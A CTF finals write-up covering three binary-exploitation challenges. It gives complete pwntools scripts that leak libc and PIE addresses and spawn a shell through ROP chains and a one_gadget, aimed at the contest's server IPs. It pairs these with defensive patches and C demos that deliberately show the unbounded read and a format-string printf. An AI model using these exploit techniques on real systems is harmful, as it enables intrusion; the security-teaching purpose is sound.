
Xiangshan Cup Finals 2023.11.19

Posted: 2023-11-19 16:33:05

Xiangshan Cup Finals

Attachments are below.
https://files.cnblogs.com/files/blogs/798207/xsb2023_final.tar.gz?t=1700382211&download=true
2023.11.19, Zhongshan, Guangdong
Went home for two days, met up with high-school classmates, went out to Sun Yat-sen University in the evening; back to Qingdao tomorrow.

A lone hero on the long road home. One against a hundred, unrivaled under heaven.

ezgame

Attack

There is a stack overflow in the name input. Just play the game until you can fight the big boss, then overflow. The binary is not PIE, so the first overflow calls puts(puts@got) to leak libc and returns into the game loop; the second overflow calls system("/bin/sh"), with one extra ret to keep the stack 16-byte aligned.

#!python
from evilblade import *   # the author's pwntools wrapper: setup/libset/rsetup/sla/pltadd/gotadd/getx64/getbase/symoff/dpx/ia

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn2')
libset('./libc-2.31.so')
evgdb()
rsetup('39.106.48.123', 31448)

puts  = pltadd('puts')            # puts@plt (binary is not PIE)
putsg = gotadd('puts')            # puts@got
rdi   = 0x0000000000401a3b        # pop rdi ; ret
ret   = 0x0000000000401016        # ret (stack alignment before system)
back  = 0x00000000004011d2        # return here after the leak for a second overflow

# Grind the game until the big boss can be fought.
for i in range(50):
    sla('>', b'2')
    sla('?', b'1')

sla('>', b'6')
for _ in range(7):
    sla('>', b'1')
for _ in range(7):
    sla('>', b'2')
sla('>', b'3')
sla('>', b'2')
sla('?', b'2')

# Overflow #1: 0x658 bytes of padding reach the saved return address.
# puts(puts@got) leaks libc, then return into the game again.
sla('name', b'a' * 0x658 + p64(rdi) + p64(putsg) + p64(puts) + p64(back))

addx = tet()
addx = getx64(0, -1)              # leaked puts address
base = getbase(addx, 'puts')
dpx('base', base)
sys = symoff('system', base)
sh  = base + 0x00000000001b45bd   # "/bin/sh" in libc-2.31
pause()

# Overflow #2: system("/bin/sh"); the single ret keeps rsp 16-byte aligned.
sla('>', b'2')
sla('?', b'2')
sla('name', b'a' * 0x658 + p64(rdi) + p64(sh) + p64(ret) + p64(sys))

dpx('base', base)

ia()

Defense

Since the stack overflow is there, add the corresponding protection. I restricted the use of execve.

how_to_stack

Attack

I got this one three minutes after the contest ended, which is a pity, but I'll write it up with the rest.

The trick is the encrypt/decrypt path: a length of -1 skips the encryption, and the read then runs past the buffer, so the hex dump printed afterwards leaks stack memory. The pointer the dump reads from is itself a temporary on the stack that the overflow overwrites, so you can choose what gets leaked: first a stack address, then a saved return address for the PIE base, then a libc address via puts(puts@got), and finally overwrite the return address with a one_gadget.

So you really have to pay attention to the temporaries a program keeps on the stack! Controlling one temporary can control a great deal!

#!python
from evilblade import *   # the author's pwntools wrapper: setup/libset/rsetup/sl/sa/ru/uu64/getx64/getbase/pltadd/gotadd/dp/dpx/ia

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn2')
libset('./libc.so.6')
evgdb()
rsetup('47.94.85.181', 41463)

# Padding that fills the buffer up to the stack temporary the dump reads from.
PAD = b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'

def leak_hex():
    """Parse the 'hex: xx xx ...' dump printed after Data and return the raw bytes."""
    ru('hex: ')
    data = ru('\n')[:-1].decode()
    dp('data', data)
    raw = b''.join(p8(int(x, 16)) for x in data.split(' '))
    dp('raw len', len(raw))
    dp('raw', raw)
    return raw

# Stage 1: length -1 skips encryption and lets read() overrun the 0x60-byte
# buffer; the last 6 bytes of the dump are a stack pointer.
sl(b'1')
sl(b'-1')
sa('Data', b'a' * 0x67)
stack = uu64(leak_hex()[-6:])
dpx('stack', stack)

# Stage 2: point the temporary at stack-0x70 so the dump contains a saved
# return address, which gives the PIE base.
sl(b'0')
sl(b'-1')
pay = PAD + p64(stack - 0x70)
sa('Data', pay + p64(stack - 0x100))
print(len(pay))
print(pay)
pie = uu64(leak_hex()[-6:]) - 6309    # leaked return address minus its offset in the binary
dpx('pie', pie)

rdi   = pie + 0x00000000000019d3      # pop rdi ; ret
ret   = pie + 0x000000000000101a      # ret
puts  = pie + pltadd('puts')
putsg = pie + gotadd('puts')

# Stage 3: ROP puts(puts@got) to leak libc, then return into the handler again.
ru(':')
sl(b'0')
sl(b'-1')
pay = PAD + p64(stack)
sa('Data', pay + p64(stack - 0x60) + p64(rdi) + p64(putsg) + p64(puts) + p64(pie + 0x16af))
ru('\n')
ru('\n')
libc = getx64(0, -1)
base = getbase(libc, 'puts')
one_gadget = base + 0xe3b01           # execve("/bin/sh", r15, rdx), constraints below

# Stage 4: overwrite the return address with the one_gadget.
sl(b'-1')
sa('Data', pay + b'\0\0' + p64(stack)[:-2] + p64(one_gadget))
ia()
'''
one_gadget output for this libc (the first gadget's address line is missing here):
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''

Defense

This challenge has:

  result = nbytes;
  if ( (_DWORD)nbytes )
  {
    memset(s, 0, 0x60uLL);
    printf("Data: ");
    read(0, s, nbytes);
    ...
  }

Changing nbytes to 0x60 in the read prevents the overflow. Note that the `if ((_DWORD)nbytes)` check only rejects zero: the -1 sent by the attack passes it, and once converted to size_t it lets read() write far past the 0x60-byte buffer.
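The decompiled read path beside a bounded version, as an added example (function names are mine, not the challenge's). vuln_read_len() shows what the original check lets through: -1 becomes SIZE_MAX and 0x67 (the attack's first payload) is 7 bytes more than the buffer. read_data() is the same control flow with the clamp the fix describes, and demo_read() feeds bytes through a pipe so the clamp can be checked offline.

```c
/* Added example (not the challenge's source): unbounded vs. clamped read length. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SZ 0x60

/* Size the vulnerable path hands to read(): `if ((_DWORD)nbytes)` only
 * rejects 0, and the int -> size_t conversion turns -1 into SIZE_MAX. */
size_t vuln_read_len(int nbytes) {
    if (nbytes == 0)
        return 0;
    return (size_t)nbytes;          /* -1 -> 0xffffffffffffffff */
}

/* Hardened: the length must be positive and is clamped to the buffer,
 * which is the "read(0, s, 0x60)" fix described above. */
size_t safe_read_len(int nbytes) {
    if (nbytes <= 0)
        return 0;
    return (size_t)nbytes > BUF_SZ ? BUF_SZ : (size_t)nbytes;
}

/* Same control flow as the decompiled snippet, but bounded.
 * Returns the number of bytes stored into s, never more than BUF_SZ. */
ssize_t read_data(int fd, unsigned char s[BUF_SZ], int nbytes) {
    size_t n = safe_read_len(nbytes);
    if (n == 0)
        return 0;
    memset(s, 0, BUF_SZ);
    return read(fd, s, n);
}

/* Make `avail` bytes available on a pipe and return how many read_data()
 * accepts for the requested nbytes. Input is constructed in-process. */
ssize_t demo_read(int nbytes, size_t avail) {
    int p[2];
    unsigned char src[0x200];
    unsigned char s[BUF_SZ];
    if (avail > sizeof src || pipe(p) != 0)
        return -1;
    memset(src, 'a', sizeof src);
    if (write(p[1], src, avail) != (ssize_t)avail) {
        close(p[0]);
        close(p[1]);
        return -1;
    }
    close(p[1]);
    ssize_t got = read_data(p[0], s, nbytes);
    close(p[0]);
    return got;
}

int main(void) {
    printf("vuln nbytes=-1   -> read() size %zu\n", vuln_read_len(-1));
    printf("vuln nbytes=0x67 -> read() size %zu (buffer is 0x%x)\n", vuln_read_len(0x67), BUF_SZ);
    printf("safe nbytes=-1   -> %zd bytes stored\n", demo_read(-1, 0x100));
    printf("safe nbytes=0x67 -> %zd bytes stored\n", demo_read(0x67, 0x100));
    return 0;
}
```

Clamping is the minimal patch; rejecting nbytes > 0x60 outright is the stricter alternative if the protocol allows it.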

camera

Defense

Every heap exploit needs a leak, and the printf in this function is unsafe: it leaks a libc address. Replace it with the program's own safe print routine.

__int64 __fastcall sub_1768(const char *a1)
{
  int v2; // [rsp+1Ch] [rbp-4h]

  v2 = strlen(a1);
  write(1, a1, v2);
  return 1LL;
}

Change the `call printf` into a call to the function above.
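Why the swap removes the leak, as an added example that is not the challenge's code. The page does not show the original call; I assume it passed the user string straight to printf as the format, which print_vuln() reproduces. print_safe() mirrors sub_1768 (write of strlen bytes), and prints_literally() pushes a string through either printer over a pipe and reports whether it came back unchanged. The probe strings are constructed inputs.

```c
/* Added example (not from the challenge): format-string printf vs. the write()-based printer. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* The patched printer from the writeup: raw bytes to fd 1, no format parsing. */
long safe_print(const char *a1) {
    int v2 = strlen(a1);
    write(1, a1, v2);
    return 1;
}

/* The same two behaviours, parameterised on an fd so they can be captured. */
ssize_t print_vuln(int fd, const char *s) { return dprintf(fd, s); }          /* attacker controls the format */
ssize_t print_safe(int fd, const char *s) { return write(fd, s, strlen(s)); }

/* 1 if `input` is reproduced byte-for-byte, 0 if the printer interpreted it,
 * -1 on pipe failure. */
int prints_literally(ssize_t (*printer)(int, const char *), const char *input) {
    char out[256];
    int p[2];
    if (pipe(p) != 0)
        return -1;
    printer(p[1], input);
    close(p[1]);
    ssize_t n = read(p[0], out, sizeof out - 1);
    close(p[0]);
    if (n < 0)
        n = 0;
    out[n] = '\0';
    return strcmp(out, input) == 0;
}

int main(void) {
    /* Constructed attacker input: each %p pulls a pointer out of the
     * argument registers / stack, the kind of libc leak the defense removes. */
    const char *probe = "%p %p %p %p\n";
    print_safe(1, "vuln : "); print_vuln(1, probe);
    print_safe(1, "safe : "); print_safe(1, probe);
    return 0;
}
```

The write()-based routine also stops at the first NUL like printf would, so it is a drop-in replacement for printing C strings; it does not help with other leak paths (uninitialised heap chunks, fd/pointer fields copied out by other code), which need their own review.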

From: https://www.cnblogs.com/9man/p/17842215.html
